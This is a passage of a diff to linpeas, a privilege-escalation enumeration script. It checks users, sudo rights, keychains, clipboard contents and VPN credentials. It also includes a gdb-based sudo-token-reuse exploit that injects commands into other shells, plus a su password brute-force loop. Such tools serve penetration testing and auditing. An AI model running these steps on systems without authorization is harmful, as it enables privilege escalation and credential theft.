+ + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done fi +fi - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" - rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," + echo "" + if [ "$EXTRA_CHECKS" ]; then print_2title "Bluetooth Info" warn_exec system_profiler SPBluetoothDataType echo "" @@ -2107,64 +2083,60 @@ if echo $CHECKS | grep -q Net; then print_2title "USB Info" warn_exec system_profiler SPUSBDataType echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" fi +fi +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q users_information; then +print_title "Users Information" +########################################### +#----------) Users Information (----------# +########################################### + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "" - - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" - - #-- UI) Clipboard and highlighted text +#-- UI) Clipboard and highlighted text +if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then print_2title "Clipboard or highlighted text?" if [ "$(command -v xclip 2>/dev/null)" ]; then echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," @@ -2177,55 +2149,57 @@ if echo $CHECKS | grep -q UsrI; then else echo_not_found "xsel and xclip" fi echo "" +fi - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break fi done - echo "" + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" - fi - fi - echo "" - - #-- UI) Doas +#-- UI) Doas +if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then print_2title "Checking doas.conf" doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then @@ -2233,85 +2207,87 @@ if echo $CHECKS | grep -q UsrI; then else echo_not_found "doas.conf" fi echo "" +fi - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" - #-- UI) Superusers - print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" fi done fi - echo "" +fi +echo "" - #-- UI) Password policy +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" + +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +fi +echo "" + +#-- UI) Password policy +if [ "$EXTRA_CHECKS" ]; then print_2title "Password policy" grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" @@ -2327,38 +2303,76 @@ if echo $CHECKS | grep -q UsrI; then sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," echo "" fi - - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC - fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC + fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" +if echo $CHECKS | grep -q software_information; then +print_title "Software Information" +########################################### +#--------) Software Information (---------# +########################################### - #-- SI) Mysql version +#-- SI) Useful software +print_2title "Useful software" +for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done +echo "" + +#-- SI) Search for compilers +print_2title "Installed Compilers" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" + +if [ "$(command -v pkg 2>/dev/null)" ]; then + print_2title "Vulnerable Packages" + pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" + echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Installed Packages" + brew list + echo "" +fi + +if [ "$MACPEAS" ]; then + print_2title "Writable Installed Applications" + system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is 